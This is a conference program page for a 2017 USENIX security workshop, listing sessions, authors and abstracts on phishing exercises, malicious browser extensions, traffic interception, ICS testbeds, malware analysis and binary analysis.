All sessions will be held in Grand Ballroom C unless otherwise noted.
The workshop papers are available for registered attendees to download now, and will be open to everyone beginning Monday, August 14. Paper abstracts are available to everyone now. Copyright to the individual works is retained by the author[s].
Downloads for Registered Attendees
(Sign in to your USENIX account to download these files.)
Monday, August 14, 2017
8:00 am–9:00 am
9:00 am–9:15 am
Program Co-Chairs: José M. Fernandez, École Polytechnique de Montréal, and Mathias Payer, Purdue University
9:15 am–10:45 am
Measuring the Internet Scale
Session Chair: Chao Zhang, Tsinghua University
Hossein Siadatii, New York University; Sean Palka and Avi Siegel, Booz Allen Hamilton; Damon McCoy, New York University
Embedded phishing exercises, which send test phishing emails, are utilized by organizations to reduce the susceptibility of its employees to this type of attack. Research studies seeking to evaluate the effectiveness of these exercises have generally been limited by small sample sizes. These studies have not been able to measure possible factors that might bias results. As a result, companies have had to create their own design and evaluation methods, with no framework to guide their efforts. Lacking such guidelines, it can often be difficult to determine whether these types of exercises are truly effective, and if reported results are statistically reliable.
In this paper, we conduct a systematic analysis of data from a large real world embedded phishing exercise that involved 19,180 participants from a single organization, and utilized 115,080 test phishing emails. The first part of our study focuses on developing methodologies to correct some sources of bias, enabling sounder evaluations of the efficacy of embedded phishing exercises and training. We then use these methods to perform an analysis of the effectiveness of this embedded phishing exercise, and through our analysis, identify how the design of these exercises might be improved.
Louis F. DeKoven, Stefan Savage, and Geoffrey M. Voelker, UCSD; Nektarios Leontiadis, Facebook
Browser extensions enhance the user experience in a variety of ways. However, to support these expanded services, extensions are provided with elevated privileges that have made them an attractive vector for attackers seeking to exploit Internet services. Such attacks are particularly vexing for the sites being abused because there is no standard mechanism for identifying which extensions are running on a user’s browser, nor is there an established mechanism for limiting the distribution of malicious extensions even when identified.
In this paper we describe an approach used at Facebook for dealing with this problem. We present a methodology whereby users exhibiting suspicious online behaviors are scanned (with permission) to identify the set of extensions in their browser, and those extensions are in turn labelled based on the threat indicators they contain. We have employed this methodology at Facebook for six weeks, identifying more than 1700 lexically distinct malicious extensions. We use this labelling to drive user device clean-up efforts as well to report to antimalware and browser vendors.
Tavish Vaidya, Eric Burger, Micah Sherr, and Clay Shields, Georgetown University
This paper describes a set of experiments we conducted to answer the question: just how prevalent is Internet interception? That is, if we sent our most sensitive information (bank information, passwords, etc.) in the clear, should we expect to regret it?
For a little over a year, we sent different types of Internet traffic over unencrypted channels between multiple clients and servers located at geographically diverse locations around the globe. Our messages contained seemingly sensitive and valuable information, including login credentials for banking sites, password reset links, etc. In total, we found no instances in which our information was acted upon by an eavesdropper.
This paper details the numerous challenges— technical, legal, and ethical—of setting up and maintaining a year-long, large-scale honeytrap. We discuss some fundamental limitations of such an experiment, and argue why our results should not be misinterpreted to suggest that message encryption is gratuitous.
10:45 am–11:15 am
Break with Refreshments
11:15 am–12:45 pm
Testbeds and Large-Scale Experiments
Session Chair: Laura S. Tinnel, SRI International
Pains, Gains and PLCs: Ten Lessons from Building an Industrial Control Systems Testbed for Security Research
Benjamin Green, Anhtuan Lee, Rob Antrobus, Utz Roedig, David Hutchison, and Awais Rashid, Lancaster University, UK
Recent years have seen a number of cyber attacks targeting Industrial Control Systems (ICSs). Reports detailing the findings from such attacks vary in detail. Hands-on experimental research is, therefore, required to better understand and explore security challenges in ICSs. However, real-world production systems are often off-limits due to the potential impact such research could have on operational processes and, in turn, safety. On the other hand, software-based simulations cannot always reflect all the potential device/system states due to oversimplified assumptions when modelling the hardware in question. As a result, laboratory-based ICS testbeds have become a key tool for research on ICS security. Development of such a testbed is a costly, labour- and time-intensive activity that must balance a range of design considerations, e.g., diversity of hardware and software platforms against scalability and complexity. Yet there is little coverage in existing literature on such design considerations, their implications and how to avoid typical pitfalls. Each group of researchers embarks on this journey from scratch, learning through a painful process of trial and error. In this paper we address this gap by reflecting on over 3 years of experience of building an extensive ICS testbed with a range of devices (e.g., PLCs, HMIs, RTUs) and software. We discuss the architecture of our testbed and reflect on our experience of addressing issues of diversity, scalability and complexity and design choices to manage trade-offs amongst these properties.
Daniel Lukaszewski and Geoffrey Xie, Naval Postgraduate School
An important class of virtual private networks (VPNs) builds secure tunnels at the transport layer leveraging TCP or UDP. Multipath TCP (MPTCP), an ongoing IETF effort that has been adopted into Linux and iOS, extends TCP to allow data to be delivered over multiple network interfaces and paths simultaneously. In this paper, using a testbed that can emulate a range of path characteristics between the VPN end points, we first empirically quantify the potential of using MPTCP tunnels to increase the goodput of VPN communications when multiple data paths are available. We further design and implement a preliminary version of Multipath UDP (MPUDP) to address the adverse effect of the duplicated congestion control actions that is known with a TCP-in-TCP tunnel. We observe that a severe asymmetry of path delays may cause an excessive amount of packet reordering at the receiving end and consequently degrade the overall performance of TCP-in-MPUDP tunnels. Moreover, we find that a packet scheduler capable of tracking path delays and allocating more packets to path(s) with shorter delay(s) to be an effective and relatively lightweight solution for MPUDP, instead of an elaborate data sequencing mechanism like the one used by MPTCP.
Lessons Learned from Using an Online Platform to Conduct Large-Scale, Online Controlled Security Experiments with Software Developers
Christian Stransky, CISPA, Saarland University; Yasemin Acar, Leibniz University Hannover; Duc Cuong Nguyen, CISPA, Saarland University; Dominik Wermke, Leibniz University Hannover; Doowon Kim and Elissa M. Redmiles, University of Maryland, College Park; Michael Backes, CISPA, Saarland University & MPI-SWS; Simson Garfinkel, U.S. Census Bureau & U.S. National Institute of Standards and Technology; Michelle L. Mazurek, University of Maryland, College Park; Sascha Fahl, Leibniz University Hannover
Security and privacy researchers are increasingly conducting controlled experiments focusing on IT professionals, such as software developers and system administrators. These professionals are typically more difficult to recruit than general end-users. In order to allow for distributed recruitment of IT professionals for security user studies, we designed Developer Observatory, a browser-based virtual laboratory platform that enables controlled programming experiments while retaining most of the observational power of lab studies. The Developer Observatory can be used to conduct large-scale, reliable online programming studies with reasonable external validity. We report on our experiences and lessons learned from two controlled programming experiments (n>200) conducted using Developer Observatory.
12:45 pm–2:00 pm
2:00 pm–4:00 pm
Frameworks for Static and Binary Analysis
Session Chair: Brendan Dolan-Gavitt, New York University
Enrico Mariconti, Jeremiah Onaolapo, Gordon Ross, and Gianluca Stringhini, University College London
Malware samples are created at a pace that makes it difficult for analysis to keep up. When analyzing an unknown malware sample, it is important to assess its capabilities to determine how much damage it can make to its victims, and perform prioritization decisions on which threats should be dealt with first. In a corporate environment, for example, a malware infection that is able to steal financial information is much more critical than one that is sending email spam, and should be dealt with the highest priority. In this paper we present a statistical approach able to determine causality relations between a specific trigger action (e.g., a user visiting a certain website in the browser) and a malware sample. We show that we can learn the typology of a malware sample by presenting it with a number of trigger actions commonly performed by users, and studying to which events the malware reacts. We show that our approach is able to correctly infer causality relations between information stealing malware and login events on websites, as well as between adware and websites containing advertisements.
Francois Gagnon, Cegep Sainte-Foy; Frederic Massicotte, Canada’s Cyber Incident Response Centre
The mobile malware threat is fought by both static and dynamic analysis, two complementary approaches in need of constant sharpening. In this paper, static analysis is revisited to update and deepen knowledge about Android malware, correlate malicious samples through common artifacts, and further understand malware developers’ modus operandi. By looking at more than 200,000 malware samples, our study revealed interesting new insights such as: the presence of duplicated permissions in the manifest, the variation of the certificate validity period between malware and benign applications, the pertinence of looking at each sample’s certificate file name, and the presence of Android applications nested inside other applications (APKs inside APKs). We also seek to revisit previous findings from related work on Android static analysis in order to confirm or refute them. In some cases, our findings are significantly different from previous work (e.g., diversity of certificates used to sign malware). Therefore, since the Android malware landscape is evolving, we conclude that our overall knowledge must be kept up-to-date.
Franck de Goër and Roland Groz, LIG - Univ. Grenoble Alpes; Laurent Mounier, Verimag - Univ. Grenoble Alpes
Memory management in a binary can be handled by a standard allocator (e.g. the libc allocator) or by a custom one. For many security and safety analysis focused on memory, the knowledge of the allocator is a requirement. In this paper, we propose an approach to retrieve allocators in binaries, based on heuristics and one single execution, with a scalable instrumentation. In addition, we propose a metric to evaluate the consistency of the detected allocator, in order to confirm or invalidate the result. Finally, we propose an open-source implementation and repeatable experiments. Preliminary results show that our approach allows to successfully retrieve the standard libc allocator in coreutils programs plus in mupdf, pdflatex and readelf; and the custom embedded allocator on jasper. They also confirm the relevance of our metric for consistency on these examples.
Invited Talk: Overlooked Foundations: Exploits as Experiments and Constructive Proofs in the Science-of-Security
Sergey Bratus, Dartmouth College
"The most important property of a program is whether it accomplishes the intentions of the user.” With these words, C.A.R. Hoare opened up his research programme, which we now recognize as a key part to the science of security—a still-nascent science, as Herley and Van Oorschot persuasively argued. Too many parts of that science are too well described by the Einstein quote about Mathematics, “As far as the laws of Mathematics refer to reality they are not certain, and as far as they are certain they do not refer to reality”—largely due to the difficulties of mathematically describing the user intentions and their deviations from reality.
Yet there is a part of security that is both precise and certain, and answers to the best standards of experimental and evidentiary approaches of established sciences. It is the part dealing with exploitation of computing systems.
4:00 pm–4:30 pm
Break with Refreshments
4:30 pm–5:30 pm
Chair: Mathias Payer, Purdue University
Panelists: Geoff Voelker, University of California, San Diego; Micah Sherr, Georgetown University; Adam Doupé, Arizona State University